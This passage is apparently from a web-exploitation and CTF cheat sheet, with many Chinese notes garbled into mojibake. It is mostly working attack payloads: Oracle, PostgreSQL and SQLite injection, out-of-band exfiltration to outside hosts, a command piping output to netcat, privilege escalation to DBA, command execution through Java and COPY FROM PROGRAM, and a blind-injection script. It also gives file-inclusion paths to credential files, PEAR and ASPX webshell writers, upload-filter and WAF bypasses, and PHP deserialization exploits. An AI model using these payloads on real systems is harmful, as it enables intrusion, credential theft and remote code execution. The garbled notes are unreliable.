CTXSYS.DRITHSX.SNSELECT * FROM news WHERE id=1 and CTXSYS.DRITHSX.SN(user, (SELECT banner FROM v$version WHERE rownum=1))=1
utl_inaddr.get_host_nameand 1=utl_inaddr.get_host_name((SQL in HERE))- çæ¬ >=11gï¼éè¦è¶ ç´ç¨æ¶ææäºç¶²è·¯æ¬éçç¨æ¶æè½ç¨
dbms_xdb_version.checkinand (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null
dbms_xdb_version.makeversionedand (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null
dbms_xdb_version.uncheckoutand (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null
dbms_utility.sqlid_to_sqlhashand (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null
- Out of band
UTL_HTTP.request('http://kaibro.tw/'||(select user from dual))=1SYS.DBMS_LDAP.INIT()utl_inaddr.get_host_address()HTTPURITYPESELECT HTTPURITYPE('http://30cm.club/index.php').GETCLOB() FROM DUAL;
extractvalue()XXESELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT xxxx)||'.oob.kaibro.tw/"> %remote;]>'),'/l') FROM dual- æ°çå·² patch
- users
select username from all_users- lists all users of the database
select name, password from sys.user$select username,password,account_status from dba_users
- Java source
- å¯ä»¥åµå»º Java æºç¢¼ä¸¦åæ Oracle ç©ä»¶
CREATE JAVA SOURCE NAMED "xxxx" AS <Java Code>
- Code execution
- load lib
create or replace library lib_evil as '/home/oracle/evil.so';create or replace function cmd(str varchar2) return varchar2 as language c library lib_evil name "cmd";select cmd('whoami') from dual;
dbms_java.runjavadbms_java.runjava('com/sun/tools/script/shell/Main -e "var p = java.lang.Runtime.getRuntime().exec(''$cmd'');"')
DBMS_JAVA_TEST.FUNCALLSELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/usr/bin/bash','-c','/bin/ls|/usr/bin/nc 1.2.3.4 1234') FROM DUAL;
DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES- å©ç¨ PL/SQL Injection ææ¬
- å½±é¿çæ¬: Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2
-- ææ¬ select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS _OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0) from dual -- 建ç«java command select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "Command" as import java.io.*;public class Command{public static String exec(String cmd) throws Exception{String sb="";BufferedInputStream in = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());BufferedReader inBr = new BufferedReader(new InputStreamReader(in));String lineStr;while ((lineStr = inBr.readLine()) != null)sb+=lineStr+"\n";inBr.close();in.close();return sb;}}'''';END;'';END;--','SYS',0,'1',0) from dual -- 賦äºjavaå·è¡æ¬é select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual -- åµå»ºå½æ¸ select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function cmd(p_cmd in varchar2) return varchar2 as language java name ''''''''Command.exec(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual -- 賦äºå½æ¸å·è¡æ¬é select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on cmd to public'''';END;'';END;--','SYS',0,'1',0) from dual -- å·è¡æ令 select sys.cmd('cmd.exe /c whoami') from dualdbms_xmlquery.newcontext- å·è¡å¤èªå¥
- å½±é¿çæ¬: oracle 10g, 11g çï¼é«çæ¬å·²ä¿®å¾©
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual; select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual; select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'; select LINXRUNCMD('whoami') from dual;
- load lib
- ç¹æ®ç¨æ³
DBMS_XMLGEN.getXML('select user from dual')
SQLite
- åå串ï¼
substr(âabc",1,1) => 'a'
- Ascii function:
unicode('d') => 100
- legth
length('ab') => 2
- Concatenation
||'a' || 'b' => 'ab'
- Time Delay
randomblob(100000000)
- 空ç½åå
0A 0D 0C 09 20
- Case when
- SQLite æ²æ
if - å¯ä»¥ç¨
Case When ... Then ...ä»£æ¿ case when (æ¢ä»¶) then ... else ... end
- SQLite æ²æ
- 註解
--
- ç表å
SELECT name FROM sqlite_master WHERE type='table'
- ç表çµæ§(å« Column)
SELECT sql FROM sqlite_master WHERE type='table'
- å
¶ä»
sqlite_version()- sqlite ç¡æ³ä½¿ç¨
\'è·³è«å®å¼è []ç¥å¥ç¨æ³CREATE TABLE a AS SELECT sql [ some shit... ]FROM sqlite_master;- CREATE TABLE å¾é¢ä¹è½æ¥ SELECT condition
- zer0pts CTF 2020 - phpNantokaAdmin
- Boolean Based: SECCON 2017 qual SqlSRF
Click here to view script
# encoding: UTF-8
# sqlite injection (POST method) (äºåæ)
# SECCON sqlsrfçadminå¯ç¢¼
require 'net/http'
require 'uri'
$url = 'http://sqlsrf.pwn.seccon.jp/sqlsrf/index.cgi'
$ans = ''
(1..100).each do |i|
l = 48
r = 122
while(l <= r)
#puts "left: #{l}, right: #{r}"
break if l == r
mid = ((l + r) / 2)
$query = "kaibro'union select '62084a9fa8872a1b917ef4442c1a734e' where (select unicode(substr(password,#{i},#{i})) from users where username='admin') > #{mid} and '1'='1"
res = Net::HTTP.post_form URI($url), {"user" => $query, "pass" => "kaibro", "login" => "Login"}
if res.body.include? 'document.location'
l = mid + 1
else
r = mid
end
end
$ans += l.chr
puts $ans
end
PostgreSQL
- åå串
substr("abc", 1, 1) => 'a'
- Ascii function
ascii('x') => 120
- Char function
chr(65) => A
- Concatenation
||'a' || 'b' => 'ab'
- Delay function
pg_sleep(5)GENERATE_SERIES(1, 1000000)repeat('a', 10000000)
- 空ç½åå
0A 0D 0C 09 20
- encode / decode
encode('123\\000\\001', 'base64')=>MTIzAAE=decode('MTIzAAE=', 'base64')=>123\000\001
- ä¸æ¯æ´limit N, M
limit a offset bç¥éå b çï¼æåº a çåºä¾
- 註解
--/**/
- $$ å代å¼è
SELECT $$This is a string$$
- ç庫å
SELECT datname FROM pg_database
- ç表å
SELECT tablename FROM pg_tables WHERE schemaname='dbname'
- çColumn
SELECT column_name FROM information_schema.columns WHERE table_name='admin'
- Dump all
array_to_string(array(select userid||':'||password from users),',')
- åè privilege
SELECT * FROM pg_roles;
- åèç¨æ¶ hash
SELECT usename, passwd FROM pg_shadow
- RCE
- CVE-2019â9193
- å¨ 9.3 çæ¬å¯¦ä½äº
COPY TO/FROM PROGRAM - çæ¬ 9.3 ~ 11.2 é è¨åç¨
- è® super user åä»»ä½å¨
pg_read_server_files群çµç user å¯ä»¥å·è¡ä»»ææ令 - æ¹æ³
DROP TABLE IF EXISTS cmd_exec;CREATE TABLE cmd_exec(cmd_output text);COPY cmd_exec FROM PROGRAM 'id';SELECT * FROM cmd_exec;
- å¨ 9.3 çæ¬å¯¦ä½äº
- çæ¬ 8.2 以å
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;select system('id');
- UDF
- sqlmap udf: https://github.com/sqlmapproject/sqlmap/tree/master/data/udf/postgresql
CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/xxx/cmd.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;SELECT sys_eval("id");
- CVE-2019â9193
- å
¶å®
- version()
- current_database()
- user
- current_user
SELECT usename FROM pg_user;
- getpgusername()
- current_schema
- current_query()
- inet_server_addr()
- inet_server_port()
- inet_client_addr()
- inet_client_port()
- type conversion
cast(count(*) as text)
md5('abc')replace('abcdefabcdef', 'cd', 'XX')=>abXXefabXXefpg_read_file(filename, offset, length)- è®æª
- åªè½è® data_directory ä¸ç
pg_ls_dir(dirname)- åç®éå §å®¹
- åªè½å data_directory ä¸ç
- PHP ç
pg_query()å¯ä»¥å¤èªå¥å·è¡ lo_import(),lo_get()è®æªselect cast(lo_import('/var/lib/postgresql/data/secret') as text)=>18440select cast(lo_get(18440) as text)=>secret_here
MS Access
- æ²æ註解
- æäºæ
æ³å¯ä»¥ç¨
%00,%16ä¾éå°é¡ä¼¼ææ
- æäºæ
æ³å¯ä»¥ç¨
- æ²æ Stacked Queries
- æ²æ Limit
- å¯ä»¥ç¨
TOP,LASTå代 'UNION SELECT TOP 5 xxx FROM yyy%00
- å¯ä»¥ç¨
- æ²æ Sleep, Benchmark, ...
- æ¯æ´ Subquery
'AND (SELECT TOP 1 'xxx' FROM table)%00
- å¨ subquery æ Union select æï¼éè¦æå®
FROM - String Concatenation
&(%26)+(%2B)'UNION SELECT 'aa' %2b 'bb' FROM table%00
- Ascii Function
ASC()'UNION SELECT ASC('A') FROM table%00
- Substring Function
Mid()Mid('admin',1,1)
- IF THEN
IFF(condition, true, false)'UNION SELECT IFF(1=1, 'a', 'b') FROM table%00
- Ref
ORM injection
- Hibernate
- ä¸æ¯æ´ UNION èªæ³
- å®å¼èè·³è«æ³
- MySQL ä¸ï¼å®å¼èç¨
\'è·³è« - HQL ä¸ï¼ç¨å
©åå®å¼è
''è·³è« 'abc\''or 1=(SELECT 1)--'- å¨ HQL æ¯ä¸åå串
- å¨ MySQL æ¯å串+é¡å¤ SQL èªå¥
- MySQL ä¸ï¼å®å¼èç¨
- Magic Function æ³
- PostgreSQL ä¸å
§å»º
query_to_xml('Arbitary SQL') - Oracle ä¸æ
dbms_xmlgen.getxml('SQL')
- PostgreSQL ä¸å
§å»º
- Java Constants
- å¯ä»¥å¾ classpath ä¸å»æ¾ constant ä¾ç¨
- ä¾å¦
ch.qos.logback.core.CoreConstants.SINGLE_QUOTE_CHARå¨ MySQL 層就æ被解æå®å¼è (å¨ HQL 層åä¸æ¯) - Example: DEVCORE Wargame 2024 - Spring
/a'*length('a')*org.apache.logging.log4j.util.Chars.QUOTE and '-- '='a- HQL: çå
/a'*length('a')*org.apache.logging.log4j.util.Chars.QUOTE and '[shit]'='a - MySQL: çå
/a'*length('a')*'[shit]'-- [shit]
- HQL: çå
- å¸¸è¦ Constants:
org.apache.batik.util.XMLConstants.XML_CHAR_APOScom.ibm.icu.impl.PatternTokenizer.SINGLE_QUOTEjodd.util.StringPool.SINGLE_QUOTEch.qos.logback.core.CoreConstants.SINGLE_QUOTE_CHARcz.vutbr.web.csskit.OutputUtil.STRING_OPENINGcom.sun.java.help.impl.DocPConst.QUOTEorg.eclipse.help.internal.webapp.utils.JSonHelper.QUOTEorg.apache.logging.log4j.util.Chars.QUOTE
- Reference
HQL injection example (pwn2win 2017)
-
order=array_upper(xpath('row',query_to_xml('select (pg_read_file((select table_name from information_schema.columns limit 1)))',true,false,'')),1)- Output:
ERROR: could not stat file "flag": No such file or directory
- Output:
-
order=array_upper(xpath('row',query_to_xml('select (pg_read_file((select column_name from information_schema.columns limit 1)))',true,false,'')),1)- Output:
ERROR: could not stat file "secret": No such file or directory
- Output:
-
order=array_upper(xpath('row',query_to_xml('select (pg_read_file((select secret from flag)))',true,false,'')),1)- Output:
ERROR: could not stat file "CTF-BR{bl00dsuck3rs_HQL1njection_pwn2win}": No such file or directory
- Output:
SQL Injection with MD5
$sql = "SELECT * FROM admin WHERE pass = '".md5($password, true)."'";- ffifdyop
- md5:
276f722736c95d99e921722cf9ed621c - to string:
'or'6<trash>
- md5:
HTTP Parameter Pollution
id=1&id=2&id=3- ASP.NET + IIS:
id=1,2,3 - ASP + IIS:
id=1,2,3 - PHP + Apache:
id=3
- ASP.NET + IIS:
SQLmap
- https://github.com/sqlmapproject/sqlmap/wiki/Usage
- Usage
python sqlmap.py -u 'test.kaibro.tw/a.php?id=1'- 庫å:
--dbs - 表å:
-D dbname --tables - column:
-D dbname -T tbname --columns - dump:
-D dbname -T tbname --dump--start=1--stop=5566
- DBA?
--is-dba - ç帳å¯:
--passwords - çæ¬é:
--privileges - æ¿shell:
--os-shell - interative SQL:
--sql-shell - è®æª:
--file-read=/etc/passwd - Delayæé:
--time-sec=10 - User-Agent:
--random-agent - Thread:
--threads=10 - Level:
--level=3- default: 1
--technique- default:
BEUSTQ
- default:
- Cookie:
--cookie="abc=55667788" - Tor:
--tor --check-tor --tor-type=SOCKS5 --tor-port=9050
- 庫å:
LFI
Testing Payload
Linux / Unix
-
Common Payload
./index.php././index.php.//index.php../../../../../../etc/passwd../../../../../../etc/passwd%00- å å¨ 5.3.0 以ä¸å¯ç¨
- magic_quotes_gpc éçºOFF
....//....//....//....//etc/passwd%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%252e/%252e/etc/passwdNN/NN/NN/etc/passwd.+./.+./.+./.+./.+./.+./.+./.+./.+./.+./etc/passwdstatic\..\..\..\..\..\..\..\..\etc\passwd
-
Config
/usr/local/apache2/conf/httpd.conf/usr/local/etc/apache2/httpd.conf/usr/local/nginx/conf/nginx.conf/etc/apache2/sites-available/000-default.conf/etc/apache2/apache2.conf/etc/apache2/httpd.conf/etc/httpd/conf/httpd.conf/etc/nginx/conf.d/default.conf/etc/nginx/nginx.conf/etc/nginx/sites-enabled/default/etc/nginx/sites-enabled/default.conf/etc/mysql/my.cnf/etc/resolv.conf/etc/named.conf/etc/rsyslog.conf/etc/samba/smb.conf/etc/openldap/slapd.conf/etc/mongod.conf/etc/krb5.conf~/.tmux.conf~/.mongorc.js$TOMCAT_HOME/conf/tomcat-users.xml$TOMCAT_HOME/conf/server.xml
-
Log
/var/log/apache2/error.log/var/log/httpd/access_log/var/log/mail.log/var/log/auth.log/var/log/messages/var/log/secure/var/log/sshd.log/var/log/mysqld.log/var/log/mongodb/mongod.log.pm2/pm2.log$TOMCAT_HOME/logs/catalina.out
-
History
.history.bash_history.sh_history.zsh_history.viminfo.php_history.mysql_history.dbshell.histfile.node_repl_history.python_history.scapy_history.sqlite_history.psql_history.rediscli_history.coffee_history.lesshst.wget-hsts.config/fish/fish_history.local/share/fish/fish_history.ipython/profile_default/history.sqlite
-
å ¶ä»
/proc/self/cmdline/proc/self/fd/[0-9]*/proc/self/environ/proc/net/fib_trie/proc/mounts/proc/net/arp/proc/net/tcp/proc/sched_debug.htaccess~/.bashrc~/.bash_profile~/.bash_logout~/.zshrc~/.aws/config~/.aws/credentials~/.boto~/.s3cfg~/.gitconfig~/.config/git/config~/.git-credentials~/.env/etc/passwd/etc/shadow/etc/hosts/etc/rc.d/rc.local/etc/boto.cfg/root/.ssh/id_rsa/root/.ssh/authorized_keys/root/.ssh/known_hosts/root/.ssh/config/etc/sysconfig/network-scripts/ifcfg-eth0/etc/exports/etc/crontab/var/spool/cron/root/var/spool/cron/crontabs/root/var/mail/<username>
Windows
C:/Windows/win.iniC:/boot.iniC:/apache/logs/access.log../../../../../../../../../boot.ini/.......................C:\Windows\System32\drivers\etc\hostsC:\WINDOWS\System32\Config\SAMC:/WINDOWS/repair/samC:/WINDOWS/repair/system%SYSTEMROOT%\System32\config\RegBack\SAM%SYSTEMROOT%\System32\config\RegBack\system%WINDIR%\system32\config\AppEvent.Evt%WINDIR%\system32\config\SecEvent.Evt%WINDIR%\iis[version].log%WINDIR%\debug\NetSetup.log%SYSTEMDRIVE%\autoexec.batC:\Documents and Settings\All Users\Application Data\Git\configC:\ProgramData\Git\config$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txtC:\inetpub\temp\appPools\DefaultAppPool\DefaultAppPool.configC:\Windows\System32\inetsrv\config\ApplicationHost.configC:\WINDOWS\debug\NetSetup.logC:\WINDOWS\pfro.logC:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config
ç°å¢è®æ¸
../../../../proc/self/environ- HTTP_User_Agentå¡php script
php://filter
php://filter/convert.base64-encode/resource=index.phpphp://filter/convert.base64-decode/resource=index.phpphp://filter/read=string.rot13/resource=index.phpphp://filter/zlib.deflate/resource=index.phpphp://filter/zlib.inflate/resource=index.phpphp://filter/convert.quoted-printable-encode/resource=index.phpphp://filter/read=string.strip_tags/resource=php://inputphp://filter/convert.iconv.UCS-2LE.UCS-2BE/resource=index.phpphp://filter/convert.iconv.UCS-4LE.UCS-4BE/resource=index.php- ...
- é²éç©æ³
- LFI RCE without controlling any file: https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT
- Memory Limit Oracle to read local file: https://github.com/DownUnderCTF/Challenges_2022_Public/blob/main/web/minimal-php/solve/solution.py
- Example:
php://input
?page=php://input- post data:
<?php system("net user"); ?> - éè¦æéå
url_allow_includeï¼5.4.0 ç´æ¥å»¢é¤
- post data:
phpinfo
- å° server 以 form-data ä¸å³æ件ï¼æç¢ç tmp æª
- å©ç¨ phpinfo å¾å° tmp æªè·¯å¾åå稱
- LFI Get shell
- éå¶
- Ubuntu 17 å¾ï¼é è¨éå
PrivateTmpï¼ç¡æ³å©ç¨
- Ubuntu 17 å¾ï¼é è¨éå
php session
- Session ä¸è¬åå¨
sess_{PHPSESSID}ä¸ - å¯ä»¥ééä¿®æ¹ Cookie å LFI æ¿ shell
- 以ä¸çºå¸¸è¦åæ¾è·¯å¾
- /var/tmp/
- /tmp/
- /var/lib/php5/
- /var/lib/php/
- C:\windows\temp\sess_
- windows
session.upload_progress- PHP é è¨éå
- ç¨ä¾ç£æ§ä¸å³æªæ¡é²åº¦
- ç¶
session.upload_progress.enabledéåï¼å¯ä»¥ POST å¨$_SESSIONä¸æ·»å è³æ (sess_{PHPSESSID}) - é å LFI å¯ä»¥ getshell
session.upload_progress.cleanup=onæï¼å¯ä»¥éé Race condition- ä¸å³ zip
- éé ææ
upload_progress_ï¼çµå°¾ä¹æå¤é¤è³æï¼å°è´ä¸å³ zip æ£å¸¸çæ³ç¡æ³è§£æ - å©ç¨ zip æ ¼å¼é¬æ£ç¹æ§ï¼åªé¤å 16 bytes ææ¯æåä¿®æ£ EOCD å CDH ç offset å¾ä¸å³ï¼å¯ä»¥è® php æ£å¸¸è§£æ zip
- éé ææ
- Example
PEAR
- æ¢ä»¶
- å®è£ pear (pearcmd.php)
- æé
register_argc_argv
- 寫æª
- æ³ä¸:
/?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php - æ³äº:
/?+-c+/tmp/shell.php+-d+man_dir=<?phpinfo();?>/*+-s+list&file=/usr/local/lib/php/pearcmd.php - æ³ä¸:
/?+download+https://kaibro.tw/shell.php+&fike=/usr/local/lib/php/pearcmd.php - æ³å:
/?+channel-discover+kaibro.tw/302.php?&file=/usr/local/lib/php/pearcmd.php- 302.php æè·³è½å° test.php åä¸è¼
- æ³ä¸:
- å®è£ package
/?+install+--force+--installroot+/tmp/wtf+http://kaibro.tw/KaibroShell.tgz+?&file=/usr/local/lib/php/pearcmd.php
- Command Injection
/?+install+-R+&file=/usr/local/lib/php/pearcmd.php&+-R+/tmp/other+channel://pear.php.net/Archive_Tar-1.4.14/?+bundle+-d+/tmp/;echo${IFS}PD9waHAgZXZhbCgkX1BPU1RbMF0pOyA/Pg==%7Cbase64${IFS}-d>/tmp/hello-0daysober.php;/+/tmp/other/tmp/pear/download/Archive_Tar-1.4.14.tgz+&file=/usr/local/lib/php/pearcmd.php&/?+svntag+/tmp/;echo${IFS}PD9waHAgZXZhbCgkX1BPU1RbMF0pOyA/Pg==%7Cbase64${IFS}-d>/tmp/hello-0daysober.php;/Archive_Tar+&file=/usr/local/lib/php/pearcmd.php&
- Command Injection 2
- ä¸ç¨å¯«æªãéè¦æ phpt file
/?page=../usr/local/lib/php/peclcmd.php&+run-tests+-i+-r"system(hex2bin('PAYLOAD'));"+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt
- Example
Nginx buffering
-
ç¶ Request body é大ææ¯ fastcgi server response é大ï¼è¶ é buffer size æï¼å ¶å §å®¹æä¿åå°æ«åæªä¸ (reference)
- æå¨
/var/lib/nginx/body/,/var/lib/nginx/fastcgi/ä¸å»ºç«æ«åæª - ä½è©²æ«åæªæ馬ä¸è¢«åªé¤
- å¯ä»¥éé
/proc/<nginx worker pid>/fd/<fd>ä¾åå¾è¢«åªé¤çæªæ¡å §å®¹- php ç
include()æå° fd è·¯å¾è§£ææ/var/lib/nginx/body/0000001337 (deleted)æ ¼å¼ï¼å°è´å¼å ¥å¤±æ - å¯ä»¥ç¨ä»¥ä¸æ¹å¼ç¹é
/proc/self/fd/34/../../../34/fd/15/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/34/fd/15
- php ç
- æå¨
-
Example
data://
- æ¢ä»¶
- allow_url_fopen: On
- allow_url_include: On
- ç¨æ³
?file=data://text/plain,<?php phpinfo()?>?file=data:text/plain,<?php phpinfo()?>?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
zip / phar
- é©ç¨é©èå¯æªåæ
- zip
- æ°å»º zipï¼è£¡é å£ç¸® php è ³æ¬(å¯æ¹å¯æªå)
?file=zip://myzip.zip#php.jpg- Example
- phar
-
<?php $p = new PharData(dirname(__FILE__).'/phartest.zip',0,'phartest2',Phar::ZIP); $x = file_get_contents('./a.php'); $p->addFromString('b.jpg', $x); ?> - æ§é
?file=phar://phartest.zip/b.jpg
-
SSI (Server Side Includes)
- é常æ¾å¨
.shtml,.shtm,.stm - Execute Command
<!--#exec cmd="command"-->
- File Include
<!--#include file="../../web.config"-->
- Example
ä¸å³æ¼æ´
Javascript檢測
- Burp Suite ä¸éä¿®æ¹
- disable javascript
Bypass MIME Detection
- Burpä¿®æ¹Content-Type
é»åå®å¤æ·å¯æªå
-
大å°å¯«ç¹é
- pHP
- AsP
-
ç©ºæ ¼ / é» / Null ç¹é
- Windowsç¹æ§
- .php(ç©ºæ ¼) // burpä¿®æ¹
- .asp.
- .php%00.jpg
-
php3457
- .php3
- .php4
- .php5
- .php7
- .pht
- .phtml
-
asp
- asa
- cer
- cdx
-
aspx
- ascx
- ashx
- asmx
- asac
- soap
- svc
- master
- web.config
-
jsp
- jspa
- jspf
- jspx
- jsw
- jsv
- jhtml
-
.htaccess
- set handler
<FilesMatch "kai"> SetHandler application/x-httpd-php </FilesMatch>- read file
ErrorDocument 404 %{file:/etc/passwd}redirect permanent "/%{BASE64:%{FILE:/etc/passwd}}"- Example: Real World CTF 4th - RWDN
-
.user.ini
- åªè¦ fastcgi éè¡ç php é½é©ç¨ (nginx/apache/iis)
- ç¨æ¶èªå®ç¾©çè¨å®æª
- å¯ä»¥è¨ç½®
PHP_INI_PERDIRåPHP_INI_USERçè¨å® - å¯ä»¥åæ è¼å ¥ï¼ä¸ç¨éå
- å¯ä»¥è¨ç½®
- 使ç¨åæ: 該ç®éä¸å¿ é æ php æ件
auto_prepend_file=test.jpg
-
æ件解ææ¼æ´
-
NTFS ADS
test.php:a.jpg- çæ
test.php - ç©ºå §å®¹
- çæ
test.php::$DATA- çæ
test.php - å §å®¹ä¸è®
- çæ
test.php::$INDEX_ALLOCATION- çæ
test.phpè³æ夾
- çæ
test.php::$DATA.jpg- çæ
0.jpg - å §å®¹ä¸è®
- çæ
test.php::$DATA\aaa.jpg- çæ
aaa.jpg - å §å®¹ä¸è®
- çæ
Magic Number
- jpg
FF D8 FF E0 00 10 4A 46 49 46
- gif
47 49 36 38 39 61
- png
89 50 4E 47
ç¹ WAF
Content-Disposition / filename / Form header
- Java (commons-fileupload)
filenameåå¾å¡%20,%09,%0a,%0b,%0c,%0d,%1c,%1d,%1e,%1f- e.g.
Content-Disposition: form-data; name="file"; %1cfilename%0a="shell.jsp"
- e.g.
- Quotable-Printable(QP) / Base64 編碼
Content-Disposition: form-data; name="file"; filename="=?UTF-8?B?c2hlbGwuanNw?="Content-Disposition: form-data; name="file"; filename="=?UTF-8?Q?=73=68=65=6c=6c=2e=6a=73=70?="
- Spring filename 編碼ç¹æ§
Content-Disposition: form-data; name="file"; filename*="1.jsp"Content-Disposition: form-data; name="file"; filename*="UTF-8'1.jpg'1.jsp"Content-Disposition: form-data; name="file"; filename*="UTF-8'1.jpg'=?UTF-8?Q?=E6=B5=8B=E8=AF=95=2Ejsp?="
- .NET (context.Request.files)
- æä¸å³æªååªå¹é
Content-Disposition:å¾çfilename=xxx Content-Disposition:name="file"kaibrokaibrofilename=shell.aspx
- æä¸å³æªååªå¹é
- ä¸ä¸è´
filename=a.php; filename*=UTF-8''a- php:
a.php - golang:
a - Example: Codegate 2024 - Cha's Wall
- php:
- Form header confusion
x=filename="1;/../shell.aspx";- WAF è¦è§:
x=filenmae="1; - å¾ç«¯è¦è§:
filename="1;/../shell.aspx"
- WAF è¦è§:
- Content-Type confusion
Content-Type: application/x-www-form-urlencoded; multipart/form-data; boundary=x
--x
Content-Disposition: form-data; name="query";
Content-Type: image/jpeg&action=search&query=aaa'or''='
meow
--x--
Boundary
Null Byte:
Content-Type: multipart/form-data; boundary=x
--x\0
Content-Disposition: form-data; name="path";
../../../../etc/passwd
--x\0
--
Double Boundary (åå¾ç«¯è§£æä¸ä¸è´):
Content-Type: multipart/form-data; BOUNDARY=y; boundary=x;
--x
Content-Disposition: form-data; name="test";
Content-Type: text/plain
--y
Content-Disposition: form-data; name="msg";
Content-Type: text/plain
1
--y--
--x--
(å¾ç«¯åy, WAFåx)
--
Combo (Double Boundary + Form header confusion + Content-type mutation):
Content-Type: multipart/form-data; BOUNDARY=y:; boundary=x;
--x
Content-Disposition: form-data; name="x";
1
--x
--y:
Content-Disposition: form-data; name="file"; x=filename="1;/../shell.aspx";
--x
Content-Disposition: form-data; name="foo";
Content-Type: <%@ Page Language="JScript"%><%eval(Request.Item["x"],"unsafe");%>
--y:--
--x--
å ¶ä»
- 常è¦å ´æ¯ï¼é åæ件解ææ¼æ´
- è¶ é·æªåæªæ·
ååºåå
PHP - Serialize() / Unserialize()
__construct()- Object被newæ調ç¨ï¼ä½unserialize()ä¸èª¿ç¨
__destruct()- Object被é·æ¯æ調ç¨
__wakeup()- unserializeæèªå調ç¨
__sleep()- 被serializeæ調ç¨
__toString()- ç©ä»¶è¢«ç¶æå串æ調ç¨
-
Value
- String
s:size:value;
- Integer
i:value;
- Boolean
b:value;('1' or '0')
- NULL
N;
- Array
a:size:{key definition; value definition; (repeat per element)}
- Object
O:strlen(class name):class name:object size:{s:strlen(property name):property name:property definition;(repeat per property)}
- å
¶ä»
- C - custom object
- R - pointer reference
- String
-
Public / Private / Protected åºåå
-
ä¾å¦ï¼classååçº:
Kaibroï¼è®æ¸åå:test -
è¥çº
Publicï¼åºååå¾ï¼...{s:4:"test";...}
-
è¥çº
Privateï¼åºååå¾ï¼...{s:12:"%00Kaibro%00test"}
-
è¥çº
Protectedï¼åºååå¾ï¼...{s:7:"%00*%00test";...}
-
PrivateåProtectedæå¤å ©å
NULLbyte
-
- Example
<?php
class Kaibro {
public $test = "ggininder";
function __wakeup()
{
system("echo ".$this->test);
}
}
$input = $_GET['str'];
$kb = unserialize($input);
- Input:
.php?str=O:6:"Kaibro":1:{s:4:"test";s:3:";id";} - Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
- Example 2 - Private
<?php
class Kaibro {
private $test = "ggininder";
function __wakeup()
{
system("echo ".$this->test);
}
}
$input = $_GET['str'];
$kb = unserialize($input);
-
Input:
.php?str=O:6:"Kaibro":1:{s:12:"%00Kaibro%00test";s:3:";id";} -
Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
-
CVE-2016-7124
- å½±é¿çæ¬ï¼
- PHP5 < 5.6.25
- PHP7 < 7.0.10
